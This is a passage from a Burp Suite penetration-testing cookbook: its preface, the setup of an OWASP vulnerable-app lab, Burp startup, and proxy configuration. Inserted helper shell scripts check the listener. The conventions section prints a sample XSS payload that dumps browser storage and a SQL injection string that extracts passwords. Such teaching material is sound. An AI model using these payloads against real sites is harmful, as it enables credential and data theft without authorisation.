What this book covers


Chapter 1, Getting Started with Burp Suite, provides setup instructions necessary 
to proceed through the material of the book. 


Chapter 2, Getting to Know the Burp Suite of Tools, begins with establishing the 
Target scope and provides overviews to the most commonly used tools within 
Burp Suite. 


Chapter 3, Configuring, Spidering, Scanning, and Reporting with Burp, helps 
testers to calibrate Burp settings to be less abusive towards the target application. 


Chapter 4, Assessing Authentication Schemes, covers the basics of
Authentication, including an explanation that this is the act of verifying that a
person's or object's claim is true.


Chapter 5, Assessing Authorization Checks, helps you understand the basics of
Authorization, including an explanation that this is how an application uses roles
to determine user functions.


Chapter 6, Assessing Session Management Mechanisms, dives into the basics of
Session Management, including an explanation that this is how an application
keeps track of user activity on a website.


Chapter 7, Assessing Business Logic, covers the basics of Business Logic 
Testing, including an explanation of some of the more common tests performed 
in this area. 


Chapter 8, Evaluating Input Validation Checks, delves into the basics of Data 
Validation Testing, including an explanation of some of the more common tests 
performed in this area. 


Chapter 9, Attacking the Client, helps you understand how Client-Side testing is 
concerned with the execution of code on the client, typically natively within a 
web browser or browser plugin. Learn how to use Burp to test the execution of 
code on the client-side to determine the presence of Cross-site Scripting (XSS). 


Chapter 10, Working with Burp Macros and Extensions, teaches you how Burp
macros enable penetration testers to automate events such as logins or response
parameter reads to overcome potential error situations. We will also learn about
extensions, which add functionality to Burp.


Chapter 11, Implementing Advanced Topic Attacks, provides a brief explanation 
of XXE as a vulnerability class targeting applications which parse XML and 
SSRF as a vulnerability class allowing an attacker to force applications to make 
unauthorized requests on the attacker’s behalf. 
Preface


Burp Suite is a Java-based platform for testing the security of your web 
applications, and has been adopted widely by professional enterprise testers. 

The Burp Suite Cookbook contains recipes to tackle challenges in determining 
and exploring vulnerabilities in web applications. You will learn how to uncover 
security flaws with various test cases for complex environments. After you have 
configured Burp for your environment, you will use Burp tools such as Spider, 
Scanner, Intruder, Repeater, and Decoder, among others, to resolve specific 
problems faced by pentesters. You will also explore working with various modes 
of Burp and then perform operations on the web using the Burp CLI. Toward the 
end, you will cover recipes that target specific test scenarios and resolve them 
using best practices. 

By the end of the book, you will be up and running with deploying Burp for 
securing web applications. 


Who this book is for 


If you are a security professional, web pentester, or software developer who 
wants to adopt Burp Suite for applications security, this book is for you. 


To get the most out of this book 


All the requirements are listed in the Technical requirements section of each
chapter.


Conventions used 


There are a number of text conventions used throughout this book. 


CodeInText: Indicates code words in text, database table names, folder names, 
filenames, file extensions, pathnames, dummy URLs, user input, and Twitter 
handles. Here is an example: "Allow the attack to continue until you reach 
payload 50." 


A block of code is set as follows:


<script>try{var m = "";var l = window.localStorage; var s =
window.sessionStorage; for(i=0;i<l.length;i++){var lKey = l.key(i);m
+= lKey + "=" + l.getItem(lKey) +
"\n"; };for(i=0;i<s.length;i++){var lKey = s.key(i);m += lKey + "="
+ s.getItem(lKey) +
"\n";};alert(m);}catch(e){alert(e.message);}</script>


Any command-line input or output is written as follows:


user 't+union+select+concat('The+password+for+',username,'+is+',+password),mysignature+from+accounts+--+


Bold: Indicates a new term, an important word, or words that you see onscreen. 
For example, words in menus or dialog boxes appear in the text like this. Here is 
an example: "Select a tool from the drop-down listing and click the Lookup Tool 
button." 


Warnings or important notes appear like this. 
Tips and tricks appear like this. 


Sections 


In this book, you will find several headings that appear frequently (Getting 
ready, How to do it..., How it works..., There's more..., and See also). 


To give clear instructions on how to complete a recipe, use these sections as 
follows: 


Getting ready 


This section tells you what to expect in the recipe and describes how to set up 
any software or any preliminary settings required for the recipe. 


How to do it... 


This section contains the steps required to follow the recipe. 


How it works... 


This section usually consists of a detailed explanation of what happened in the 
previous section. 


There's more... 


This section consists of additional information about the recipe in order to make 
you more knowledgeable about the recipe. 


See also 


This section provides helpful links to other useful information for the recipe. 


Get in touch 


Feedback from our readers is always welcome. 


General feedback: If you have questions about any aspect of this book, mention 
the book title in the subject of your message and email us at 
customercare@packtpub.com. 


Errata: Although we have taken every care to ensure the accuracy of our
content, mistakes do happen. If you have found a mistake in this book, we would
be grateful if you would report this to us. Please visit
www.packt.com/submit-errata, selecting your book, clicking on the Errata
Submission Form link, and entering the details.


Piracy: If you come across any illegal copies of our works in any form on the
Internet, we would be grateful if you would provide us with the location address
or website name. Please contact us at copyright@packt.com with a link to the
material.


If you are interested in becoming an author: If there is a topic that you have
expertise in and you are interested in either writing or contributing to a book,
please visit authors.packtpub.com.


Reviews 


Please leave a review. Once you have read and used this book, why not leave a 
review on the site that you purchased it from? Potential readers can then see and 
use your unbiased opinion to make purchase decisions, we at Packt can 
understand what you think about our products, and our authors can see your 
feedback on their book. Thank you! 


For more information about Packt, please visit packt.com. 


Disclaimer 


The information within this book is intended to be used only in an ethical 
manner. Do not use any information from the book if you do not have written 
permission from the owner of the equipment. If you perform illegal actions, you 
are likely to be arrested and prosecuted to the full extent of the law. Packt 
Publishing does not take any responsibility if you misuse any of the information 
contained within the book. The information herein must only be used while 
testing environments with proper written authorizations from appropriate 
persons responsible. 


Targeting legal vulnerable web applications


In order for us to properly showcase the functions of Burp Suite, we need a 
target web application. We need to have a target which we are legally allowed to 
attack. 


“Know Your Enemy” is a saying derived from Sun Tzu's The Art of War. The 
application of this principle in penetration testing is the act of attacking a target. 
The purpose of the attack is to uncover weaknesses in a target which can then be 
exploited. Commonly referred to as ethical hacking, attacking legal targets 
assists companies to assess the level of risk in their web applications. 


More importantly, any penetration testing must be done with express, written 
permission. Attacking any website without this permission can result in litigation 
and possible incarceration. Thankfully, the information security community 
provides many purposefully vulnerable web applications to allow students to 
learn how to hack in a legal way. 


A consortium group, Open Web Application Security Project, commonly 
referred to as OWASP, provides a plethora of resources related to web security. 
OWASP is considered the de facto standard in the industry for all things web 
security-related. Every three years or so, the group creates a listing of the Top 10 
most common vulnerabilities found in web applications. 


See here for more information:
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project.


Throughout this book, we will use purposefully vulnerable web applications 
compiled into one virtual machine by OWASP. This setup enables us to legally 
attack the targets contained within the virtual machine. 


Getting Started with Burp Suite 


In this chapter, we will cover the following recipes: 


• Downloading Burp (Community, Professional)
• Setting up a web app pentesting lab
• Starting Burp at a command line or an executable
• Listening for HTTP traffic, using Burp


Introduction 


This chapter provides the setup instructions necessary to proceed through the 
material in this book. Starting with downloading Burp, the details include the 
two main Burp editions available and their distinguishing characteristics. 


To use the Burp suite, a penetration tester requires a target application. This 
chapter includes instructions on downloading and installing OWASP 
applications contained within a virtual machine (VM). Such applications will 
be used throughout the book as targeted vulnerable web applications. 


Also included in this chapter is configuring a web browser to use the Burp
Proxy Listener. This listener is required to capture HTTP traffic between
Burp and the target web application. Default settings for the listener include
an Internet Protocol (IP) address, 127.0.0.1, and port number 8080.


Finally, this chapter concludes with the options for starting Burp. This includes 
how to start Burp at the command line, also with an optional headless mode, and 
using the executable. 


Downloading Burp (Community, Professional)


The first step in learning the techniques contained within this book is to 
download the Burp suite. The download page is available here 
(https://portswigger.net/burp/). You will need to decide which edition of the Burp 
suite you would like to download from the following: 


• Professional
• Community
• Enterprise (not covered)


What is now termed Community was once labeled Free Edition. You may see 
both referenced on the internet, but they are one and the same. At the time of this 
writing, the Professional edition costs $399. 


To help you make your decision, let's compare the two. The Community version 
offers many of the functions used in this book, but not all. For example, 
Community does not include any scanning functionality. In addition, the 
Community version contains some forced throttling of threads when using the 
Intruder functionality. There are no built-in payloads in the Community version, 
though you can load your own custom ones. And, finally, several Burp 
extensions that require Professional will, obviously, not work in the Community 
edition. 


The Professional version has all functionality enabled, including passive and
active scanners. There is no forced throttling. PortSwigger (that is, the name of
the company that writes and maintains the Burp suite) provides several built-in
payloads for fuzzing and brute-forcing. Burp extensions using scanner-related
API calls work in the Professional version as well.


In this book, we will be using the Professional version, though much of the
functionality shown is also available in the Community edition. However, when a
feature used in this book is specific to the Professional edition, a special icon
will indicate this. The icon used is the following:


[Icon: Burp Suite Professional]


Getting ready 


To begin our adventure together, go to https://portswigger.net/burp and 
download the edition of the Burp suite you wish to use. The page provides a 
slider, as following, which highlights the features of Professional and 
Community, allowing you to compare them: 


[Screenshot: the download page's "Select edition to view features" slider, switching the feature listing between Professional and Community]


Many readers may choose the Community edition to gain familiarity with the 
product prior to purchasing. 


Should you choose to purchase or trial the Professional edition, you will need to
complete forms or payments, and subsequent email confirmations will be sent to
you. Once your account is created, you may log in and perform the download
from the links provided in your account.


Software tool requirements 


To complete this recipe, you will need the following: 


• Oracle Java (https://www.java.com/en/download/)
• Burp Proxy Community or Professional (https://portswigger.net/burp/)
• Firefox Browser (https://www.mozilla.org/en-US/firefox/new/)


How to do it... 


After deciding on the edition you need, you have two installation options:
an executable or a plain JAR file. The executable is only available for
Windows and is offered in both 32-bit and 64-bit builds. The plain JAR file is
available for Windows, macOS, and Linux.


The Windows executable is self-contained and will create icons in your program
listing. However, the plain JAR file requires your platform to have Java
(https://www.java.com/en/download/) pre-installed. Either the JRE or the JDK
will do, so feel free to choose the latest version:


[Screenshot: PortSwigger download page with Download buttons for the plain JAR file, Linux (64-bit), Mac OSX, and Windows (32-bit), each with a View Checksums link]


Setting up a web app pentesting lab 


The Broken Web Application (BWA) is an OWASP project that provides a self- 
contained VM complete with a variety of applications with known 
vulnerabilities. The applications within this VM enable students to learn about 
web application security, practice and observe web attacks, and make use of 
penetration tools such as Burp. 


To follow the recipes shown in this book, we will utilize OWASP's BWA VM. At
the time of this writing, the OWASP BWA VM can be downloaded from
https://sourceforge.net/projects/owaspbwa/files/.


Getting ready 


We will download the OWASP BWA VM along with supportive tools to create 
our web app pentesting lab. 


Software tool requirements 


To complete this recipe, you will need the following: 


• Oracle VirtualBox (https://www.virtualbox.org/wiki/Downloads)
    ◦ Choose an executable specific to your platform
• Mozilla Firefox Browser (https://www.mozilla.org/en-US/firefox/new/)
• 7-Zip file archiver (https://www.7-zip.org/download.html)
• OWASP BWA VM (https://sourceforge.net/projects/owaspbwa/files/)
• Burp Proxy Community or Professional (https://portswigger.net/burp/)
• Oracle Java (https://www.java.com/en/download/)


How to do it... 


For this recipe, you will need to download the OWASP BWA VM and install it 
by performing the following steps: 


1. Click Download Latest Version from the OWASP BWA VM link provided
earlier and unzip the file OWASP_Broken_Web_Apps_VM_1.2.7z.

2. You will be presented with a listing of several files, as follows:


   owaspbwa-release-notes.txt
   OWASP Broken Web Apps-cl1.vmdk
   OWASP Broken Web Apps-cl1-s001.vmdk
   OWASP Broken Web Apps-cl1-s002.vmdk
   OWASP Broken Web Apps-cl1-s003.vmdk
   OWASP Broken Web Apps-cl1-s004.vmdk
   OWASP Broken Web Apps-cl1-s005.vmdk
   OWASP Broken Web Apps.vmsd
   OWASP Broken Web Apps.vmxf
   OWASP Broken Web Apps.vmx
   OWASP Broken Web Apps.nvram


3. All file extensions shown indicate the VM can be imported into Oracle 
VirtualBox or VMware Player/Workstation. For purposes of setting up the 
web application pentesting lab for this book, we will use Oracle VirtualBox. 

4. Make a note of the OWASP Broken Web Apps-cl1.vmdk file. Open the
VirtualBox Manager (that is, the Oracle VM VirtualBox program).

5. Within the VirtualBox Manager screen, select Machine | New from the top 
menu and type a name for the machine, OWASP BWA. 

6. Set the type to Linux and version to Ubuntu (64-bit), and then click Next, as 
follows: 


[Screenshot: VirtualBox Create Virtual Machine dialog, Name and operating system step, with Name: OWASP BWA, Type: Linux, Version: Ubuntu (64-bit), and Expert Mode, Next and Cancel buttons]


7. The next screen allows you to adjust the RAM or leave as suggested. Click 
Next. 

8. On the next screen, choose Use an existing virtual hard disk file. 

9. Use the folder icon on the right to select the OWASP Broken Web Apps-
cl1.vmdk file from the extracted list and click Create, as follows:


[Screenshot: VirtualBox Create Virtual Machine dialog, Hard disk step, with Use an existing virtual hard disk file selected and OWASP Broken Web Apps-cl1.vmdk (Normal, 8.00 GB) chosen; the other options are Do not add a virtual hard disk and Create a virtual hard disk now]


10. Your VM is now loaded in the VirtualBox Manager. Let's make some minor 
adjustments. Highlight the OWASP BWA entry and select Settings from 
the top menu. 

11. Select the Network section in the left-hand pane and change to Host-only 
Adapter. Click OK. 


[Screenshot: OWASP BWA - Settings dialog, Network section, Adapter 1 enabled, Attached to: Host-only Adapter, Name: VirtualBox Host-Only Ethernet Adapter]


12. Now let's start the virtual machine. Right-click then choose Start | Normal 
Start. 


[Screenshot: VirtualBox Manager context menu on the powered-off OWASP BWA entry, showing Settings..., Clone..., Remove..., Group and Start]


13. Wait until the Linux system is fully booted, which may take a few minutes. 
After the booting process is complete, you should see the following screen. 
However, the IP address shown will be different for your machine: 


Welcome to the OWASP Broken Web Apps VM

!!! This VM has many serious security issues. We strongly recommend that you run
it only on the "host only" or "NAT" network in the VM settings !!!

You can access the web apps at http://192.168.56.101/

You can administer / configure this machine through the console here, by SSHing
to 192.168.56.101, via Samba at \\192.168.56.101\, or via phpmyadmin at
http://192.168.56.101/phpmyadmin.

In all these cases, you can use username "root" and password "owaspbwa".

OWASP Broken Web Applications VM Version 1.2
Log in with username = root and password = owaspbwa

owaspbwa login:


14. The information presented on this screen identifies the URL where you can
access vulnerable web applications running on the VM. For example, in the
previous screenshot, the URL is http://192.168.56.101/. You are given
a prompt for administering the VM, but it is not necessary to log in at this
time.

15. Open the Firefox browser on your host system, not in the VM. Using the
Firefox Browser on your host machine, enter the URL provided (for
example, http://192.168.56.101/), where the IP address is specific to
your machine.

16. In your browser, you are presented with an index page containing links to
vulnerable web applications. These applications will be used as targets
throughout this book:


[Screenshot: the owaspbwa index page]

OWASP Broken Web Applications Project
Version 1.2

This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very vulnerable web applications, which are listed below. More information about this project can be found in the project User Guide and Home Page.

For details about the known vulnerabilities in these applications, see https://sourceforge.net/p/owaspbwa/tickets/?limit=999&sort=_severity+asc.

TRAINING APPLICATIONS: OWASP WebGoat, OWASP WebGoat.NET, OWASP ESAPI Java SwingSet Interactive, OWASP Mutillidae II, OWASP RailsGoat, OWASP Bricks, OWASP Security Shepherd, Ghost, Magical Code Injection Rainbow, bWAPP, Damn Vulnerable Web Application


How it works...


Leveraging a customized virtual machine created by OWASP, we can quickly set 
up a web app pentesting lab containing purposefully vulnerable applications, 
which we can use as legal targets for our exercises throughout this book. 


Starting Burp at a command line or as an executable


For non-Windows users, or those Windows users who chose the plain JAR file
option, you will start Burp at a command line each time you wish to run it. As
such, you will require a particular Java command to do so.


In some circumstances, such as automated scripting, you may wish to invoke
Burp at the command line as a line item in your shell script. Additionally, you
may wish to run Burp without a graphical user interface (GUI), referred to as
headless mode. This section describes how to perform these tasks.


How to do it... 


We will review the commands and actions required to start the Burp Suite 
product: 


1. Start Burp in Windows, after running the installer from the downloaded
.exe file, by double-clicking the icon on the desktop or selecting it from the
programs listing:


[Screenshot: Windows programs listing showing Burp Suite Professional and Burp Suite Professional Uninstaller]


When using the plain JAR file, the executable java is followed by the
option -jar, followed by the name of the downloaded JAR file.


2. Start Burp at the command line (minimal) with the plain JAR file (Java 
must be installed first): 


If you prefer more control over the heap size settings (that is, the amount 
of memory allocated for the program) you may modify the java 
command. 


3. The java executable is followed by -jar, then the memory
allocation. In this case, 2 GB (that is, 2g) is allocated for random access
memory (RAM), followed by the name of the JAR file. If you get an error
to the effect that you cannot allocate that much memory, just drop the
amount down to something like 1,024 MB (that is, 1024m) instead.

4. Start Burp at command line (optimize) with the plain JAR file (Java must 
be installed first): 


5. It is possible to start Burp at the command line and to run it in headless 
mode. Headless mode means running Burp without the GUI. 


For the purposes of this book, we will not be running Burp in headless 
mode, since we are learning through the GUI. However, you may require 
this information in the future, which is why it is presented here. 


6. Start Burp at the command line to run in headless mode with the plain JAR 
file (Java must be installed first): 


Note the placement of the parameter -Djava.awt.headless=true
immediately following the -jar option and before the name of the JAR
file.


7. If successful, you should see the following: 


Press Ctrl + C or Ctrl + Z to stop the process. 


8. It is possible to provide a configuration file to the headless mode command 
for customizing the port number and IP address where the proxy listener is 
located. 


Please consult PortSwigger's support pages for more information on this
topic: https://support.portswigger.net/customer/portal/questions/16805563-burp-command-line.


9. In each startup scenario described, you should be presented with a splash 
screen. The splash screen label will match whichever edition you decided 
to download, either Professional or Community. 

10. You may be prompted to update the version; feel free to do this, if you like. 
New features are constantly added into Burp to help you find 
vulnerabilities, so upgrading the application is a good idea. Choose Update 
Now, if applicable. 


11. Next, you are presented with a dialog box asking about project files and 
configurations: 


( ) Temporary project
( ) New project on disk
( ) Open existing project


12. If you are using the Community edition, you will only be able to create a 
temporary project. If you are using the Professional edition, create a new 
project on disk, saving it in an appropriate location for you to find. Click 
Next. 


13. The subsequent splash screen asks you about the configurations you would 
like to use. At this point, we don't have any yet, so choose Use Burp 
defaults. As you progress through this book, you may wish to save 
configuration settings and load them from this splash screen in the future, 
as follows: 


[Screenshot: Burp Suite Professional project configuration dialog, "Select the configuration that you would like to load for this project", with the options Use Burp defaults, Use options saved with project and Load from configuration file, the checkboxes Default to the above in future and Disable extensions, and the Cancel, Back and Start Burp buttons]


14. Finally, we are ready to click Start Burp. 
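As an added example (not the book's own script), the following POSIX shell wrapper gathers the three command-line start modes from steps 2 to 6 into one place and automates the heap fallback described in step 3 by probing the JVM before launching. The JAR filename burpsuite_community.jar and the JAVA_BIN override are assumptions; set BURP_JAR to whichever edition you downloaded.

```shell
#!/bin/sh
# Added example, not from the Burp Suite Cookbook: wrap the command-line start
# modes described in the recipe. BURP_JAR is an assumed filename; set it to the
# JAR you actually downloaded. JAVA_BIN exists so the heap probe can be driven
# by a stub in tests instead of a real JVM.
BURP_JAR="${BURP_JAR:-burpsuite_community.jar}"

# Print the java command line for one start mode.
#   minimal   : java -jar <jar>
#   optimized : java -jar -Xmx<heap> <jar>     (heap defaults to 2g)
#   headless  : java -jar -Djava.awt.headless=true <jar>
# JVM options placed after -jar are still parsed by the launcher, because the
# first argument that does not start with '-' is taken as the JAR file.
burp_cmd() {
  mode="$1"
  heap="${2:-2g}"
  case "$mode" in
    minimal)   printf 'java -jar %s\n' "$BURP_JAR" ;;
    optimized) printf 'java -jar -Xmx%s %s\n' "$heap" "$BURP_JAR" ;;
    headless)  printf 'java -jar -Djava.awt.headless=true %s\n' "$BURP_JAR" ;;
    *) echo "burp_cmd: unknown mode '$mode'" >&2; return 1 ;;
  esac
}

# Print the first heap size in the argument list that the JVM can reserve.
# "java -Xmx<size> -version" exits non-zero when the reservation fails, which is
# the error the recipe tells you to answer by dropping down to 1024m.
pick_heap() {
  java_bin="${JAVA_BIN:-java}"
  for heap in "$@"; do
    if "$java_bin" -Xmx"$heap" -version >/dev/null 2>&1; then
      echo "$heap"
      return 0
    fi
  done
  echo "pick_heap: JVM refused every heap size tried ($*)" >&2
  return 1
}

# Build the optimized command line with a heap the JVM accepted: 2g first,
# 1024m as the fallback.
optimized_cmd() {
  heap="$(pick_heap 2g 1024m)" || return 1
  burp_cmd optimized "$heap"
}

# Usage: sh start_burp.sh minimal|optimized|headless
# With no argument the file only defines the functions, so it can be sourced.
if [ $# -gt 0 ]; then
  command -v "${JAVA_BIN:-java}" >/dev/null 2>&1 || {
    echo "java not found; install Java first" >&2; exit 1; }
  [ -f "$BURP_JAR" ] || { echo "JAR not found: $BURP_JAR" >&2; exit 1; }
  case "$1" in
    optimized) cmd="$(optimized_cmd)" || exit 1 ;;
    *)         cmd="$(burp_cmd "$1")" || exit 1 ;;
  esac
  echo "starting: $cmd"
  exec $cmd   # split on purpose: the line was built from plain tokens (no spaces in BURP_JAR)
fi
```

Run it as `sh start_burp.sh headless` to get the same command line as step 6; the probe in pick_heap is what lets the script pick 1024m on a machine that cannot hand the JVM 2 GB, instead of failing and asking you to retype the command.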


How it works... 


Using either the plain JAR file or the Windows executable, you can launch Burp 
to start the Proxy listener to capture HTTP traffic. Burp offers temporary or 
permanent Project files to save activities performed in the suite. 


Listening for HTTP traffic, using Burp


Burp is described as an intercepting proxy. This means Burp sits between the 
user's web browser and the application's web server and intercepts or captures all 
of the traffic flowing between them. This type of behavior is commonly referred 
to as a Proxy service. 


Penetration testers use intercepting proxies to capture traffic flowing between a 
web browser and a web application for the purposes of analysis and 
manipulation. For example, a tester can pause any HTTP request, thus allowing 
parameter tampering prior to sending the request to the web server. 


Intercepting proxies, such as Burp, allow testers to intercept both HTTP requests 
and HTTP responses. This allows a tester to observe the behavior of the web 
application under different conditions. And, as we shall see, sometimes, the 
behaviors are unintended from what the original developer expected. 


To see the Burp suite in action, we need to configure our Firefox browser's 
Network Settings to point to our running instance of Burp. This enables Burp to 
capture all HTTP traffic that is flowing between your browser and the target web 
application. 


Getting ready 


We will configure the Firefox browser to allow Burp to listen to all HTTP traffic
flowing between the browser and the OWASP BWA VM. This will allow the
proxy service within Burp to capture traffic for testing purposes.


Instructions are available on PortSwigger at
https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp
and we will also step through the process in the following recipe.


How to do it... 


The following are the steps you can go through to listen to all HTTP traffic 
using Burp: 


1. Open the Firefox browser and go to Options.

2. In the General tab, scroll down to the Network Proxy section and then click
Settings.

3. In the Connection Settings, select Manual proxy configuration and type in
the IP address of 127.0.0.1 with port 8080. Select the Use this proxy server
for all protocols checkbox.

4. Make sure the No proxy for textbox is blank, as shown in the following
screenshot, and then click OK:


[Screenshot: Firefox Connection Settings dialog. Under Configure Proxy Access to the Internet, Manual proxy configuration is selected (the other options are No proxy, Auto-detect proxy settings for this network, Use system proxy settings and Automatic proxy configuration URL). HTTP Proxy is 127.0.0.1 port 8080 with Use this proxy server for all protocols checked, so SSL Proxy, FTP Proxy and SOCKS Host mirror 127.0.0.1 port 8080 (SOCKS v5). The No Proxy for field is empty; its placeholder reads "Example: mozilla.org, .net.nz, 192.168.1.0/24". Buttons: OK, Cancel, Help]


5. With the OWASP BWA VM running in the background and using Firefox to
browse to the URL specific to your machine (that is, the IP address shown
on the Linux VM in VirtualBox), click the reload button (the arrow in a
circle) to see the traffic captured in Burp.


6. If you don't happen to see any traffic, check whether Proxy Intercept is 
holding up the request. If the button labeled Intercept is on is depressed, as 
shown in the following screenshot, then click the button again to disable the 
interception. After doing so, the traffic should flow freely into Burp, as 
follows: 


[Screenshot: Burp Proxy | Intercept tab with a held request and the Forward, Drop, Intercept is on and Action buttons; HTTP history and WebSockets history subtabs are visible above the Raw and Hex views]

In the following, the Proxy | Intercept button is disabled:

[Screenshot: the same Proxy | Intercept tab showing Intercept is off, with the Target, Spider, Scanner, Intruder, Repeater and Sequencer tabs along the top and the HTTP history, WebSockets history and Options subtabs]


7. If everything is working properly, you will see traffic on your Target | Site 
map tab similar to what is shown in the following screenshot. Your IP 
address will be different, of course, and you may have more items shown 
within your Site map. Congratulations! You now have Burp listening to all 
of your browser traffic! 


[Screenshot: Target | Site map tab listing the captured host with entries such as animatedcollapse.js, images, index.css and jquery.min.js]


How it works... 


The Burp Proxy service is listening on 127.0.0.1 port 8080. Either of these 
settings can be changed to listen on an alternative IP address or port number. 
However, for the purpose of learning, we will use the default settings. 
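As an added example (not from the book), the following POSIX shell script checks the two things that most often explain "no traffic in Burp" after this recipe: the listener not being up on 127.0.0.1:8080, and the target host being excluded by Firefox's No proxy for list. It then pushes one request through the listener with curl so it appears in Proxy | HTTP history. BURP_HOST, BURP_PORT, TARGET and NO_PROXY_LIST are assumed variable names; 192.168.56.101 is the sample VM address from the earlier screenshot, and the bypass check handles host names and domain suffixes only, not CIDR ranges.

```shell
#!/bin/sh
# Added example, not from the Burp Suite Cookbook: confirm that the Burp Proxy
# listener is reachable and route one request through it, the same path the
# browser takes once Firefox points at 127.0.0.1:8080. The defaults below are
# assumptions matching the recipe; the VM address differs per machine.
BURP_HOST="${BURP_HOST:-127.0.0.1}"
BURP_PORT="${BURP_PORT:-8080}"
TARGET="${TARGET:-http://192.168.56.101/}"

# Proxy URL in the form curl's --proxy option expects.
proxy_url() { printf 'http://%s:%s\n' "$BURP_HOST" "$BURP_PORT"; }

# Host part of an http URL: scheme, port and path stripped.
url_host() {
  h="${1#*://}"; h="${h%%/*}"; h="${h%%:*}"
  printf '%s\n' "$h"
}

# Firefox's "No proxy for" field is a comma-separated list of hosts and domain
# suffixes. Return 0 when the target host would skip the proxy, which is why
# the recipe tells you to leave the field blank. "mozilla.org" and ".mozilla.org"
# both cover the domain and its subdomains; CIDR entries are not interpreted.
bypasses_proxy() {
  host="$1"; rc=1
  old_ifs="$IFS"; IFS=','
  for entry in $2; do
    entry="$(printf '%s' "$entry" | tr -d ' ')"   # whitespace around entries is ignored
    entry="${entry#.}"                            # leading dot is optional
    [ -n "$entry" ] || continue
    case "$host" in
      "$entry"|*".$entry") rc=0 ;;
    esac
  done
  IFS="$old_ifs"
  return $rc
}

# Return 0 if a TCP listener accepts connections on host:port. Uses nc when it
# is installed and bash's /dev/tcp otherwise; plain sh has no sockets, so the
# probe is skipped with status 2 rather than reported as a failure.
listener_up() {
  if command -v nc >/dev/null 2>&1; then
    nc -z -w 2 "$1" "$2" >/dev/null 2>&1
  elif [ -n "${BASH_VERSION:-}" ]; then
    (exec 3<>"/dev/tcp/$1/$2") 2>/dev/null
  else
    return 2
  fi
}

# Send one GET through Burp and print the HTTP status code. curl exits 7 when
# nothing is listening on the proxy address and 0 once Burp relays the request.
fetch_via_burp() {
  curl -sS -o /dev/null -w '%{http_code}\n' --proxy "$(proxy_url)" "$1"
}

main() {
  host="$(url_host "$TARGET")"
  if bypasses_proxy "$host" "${NO_PROXY_LIST:-}"; then
    echo "$host matches the No proxy for list; Firefox would skip Burp for it" >&2
    return 1
  fi
  if listener_up "$BURP_HOST" "$BURP_PORT"; then
    echo "Burp listener reachable at $(proxy_url)"
  elif [ $? -eq 2 ]; then
    echo "cannot probe the listener from plain sh; continuing" >&2
  else
    echo "nothing listening on $(proxy_url); start Burp or check Proxy | Options" >&2
    return 1
  fi
  echo "HTTP status via Burp: $(fetch_via_burp "$TARGET")"
}

# Usage: NO_PROXY_LIST="mozilla.org, .net.nz" sh burp_listener_check.sh run
# Without the 'run' argument the file only defines the functions.
if [ "${1:-}" = "run" ]; then
  main
fi
```

If the script reports the listener as up but Firefox still shows nothing, the remaining suspect is Intercept is on holding the request (step 6 of the recipe); if curl gets a status code, Burp is relaying traffic and the browser configuration is what needs rechecking.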


Getting to Know the Burp Suite of Tools


In this chapter, we will cover the following recipes: 


• Setting the Target Site Map
• Understanding Message Editor
• Repeating with Repeater
• Decoding with Decoder
• Intruding with Intruder


Introduction 


This chapter provides overviews of the most commonly used tools within Burp 
Suite. The chapter begins by establishing the Target scope within the Target Site 
Map. This is followed by an introduction to the Message Editor. Then, there will 
be some hands-on recipes using OWASP Mutillidae II to get acquainted with 
Proxy, Repeater, Decoder, and Intruder. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


• Burp Proxy Community or Professional (https://portswigger.net/burp/)
• The Firefox browser configured to allow Burp to proxy traffic
  (https://www.mozilla.org/en-US/firefox/new/)


Setting the Target Site Map


Now that we have traffic flowing between your browser, Burp, and the OWASP
BWA virtual machine, we can begin setting the scope of our test. For this recipe,
we will use the OWASP Mutillidae II link
(http://<Your_VM_Assigned_IP_Address>/mutillidae/) available in the
OWASP BWA VM as our target application.


Looking more closely at the Target tab, you will notice there are two subtabs 
available: Site map and Scope. From the initial proxy setup between your 
browser, Burp, and the web server, you should now have some URLs, folders, 
and files shown in the Target | Site map tab. You may find the amount of 
information overwhelming, but setting the scope for our project will help to 
focus our attention better. 


Getting ready 


Using the Target | Site map and Target | Scope tab, we will assign the URL for 
mutillidae (http://<Your_VM_Assigned_IP_Address>/mutillidae/) as 
the scope. 


How to do it... 


Execute the following steps to set the Target Site Map: 


1. Search for the folder mutillidae, right-click it, and select Add to scope. 
Notice the brief highlighting of the Target | Scope subtab, as follows: 


[Screenshot: Target | Site map tab. Filter: Hiding not found items; hiding CSS, 
image and general binary content. The site tree lists http://192.168.56.101 
with folders such as AppSensorDemo, ESAPI-Java-SwingSet-Interactive, 
WackoPicko, WebGoat, awstats, bWAPP, bodgeit, cyclone, gallery2, getboo, 
gruyere, gtd-php, joomla, mono, and mutillidae, with a Contents table of hosts 
beside it. Right-clicking the mutillidae folder opens a context menu with Add 
to scope and Spider this branch.] 


2. Upon adding the folder mutillidae to your scope, you may be presented 
with a Proxy history logging dialog box, as follows. You may choose to 
avoid collecting messages out of your scope by clicking Yes. Or you may 
choose to continue to have the Proxy HTTP History table collect any 
messages passing through Burp, even if those messages fall outside the 
scope you've identified. For our purposes, we will select Yes: 


[Dialog: You have added an item to Target scope. Do you want Burp Proxy to 
stop sending out-of-scope items to the history or other Burp tools? 
Answering "yes" will avoid accumulating project data for out-of-scope items. 
[ ] Always take the same action in future    Yes | No] 


3. Flipping over the Target | Scope tab, you should now see the full URL for 
the OWASP Mutillidae II, shown in the Include in scope table, as follows: 


[Screenshot: Target | Scope tab. Define the in-scope targets for your current 
work. This configuration affects the behavior of tools throughout the suite. 
[ ] Use advanced scope control. Include in scope: 
http://192.168.56.101/mutillidae] 
How it works... 


The Message Editor displays detailed information about any HTTP message 
flowing through the Proxy listener. After setting up Proxy to capture HTTP 
traffic, as seen in your Target | Site map and Burp Proxy | HTTP history tab, 
you are able to select any single message to reveal the Message Editor. Each 
editor contains the request and response sides of the message, so long as the 
message is properly proxied through Burp. 


Understanding the Message Editor 


On almost every tool and tab within Burp Suite that displays an HTTP message, 
you will see an editor identifying the request and response. This is commonly 
referred to as the Message Editor. The Message Editor allows viewing and 
editing HTTP requests and responses through several specialized views. 


Within the Message Editor are multiple subtabs. The subtabs for a request 
message, at a minimum, include the following: 


• Raw 
• Headers 
• Hex 


The subtabs for a response message include the following: 


• Raw 
• Headers 
• Hex 
• HTML (sometimes) 
• Render (sometimes) 


The Raw tab gives you the message in its raw HTTP form. The Headers tab 
displays HTTP header parameters in tabular format. The parameters are editable, 
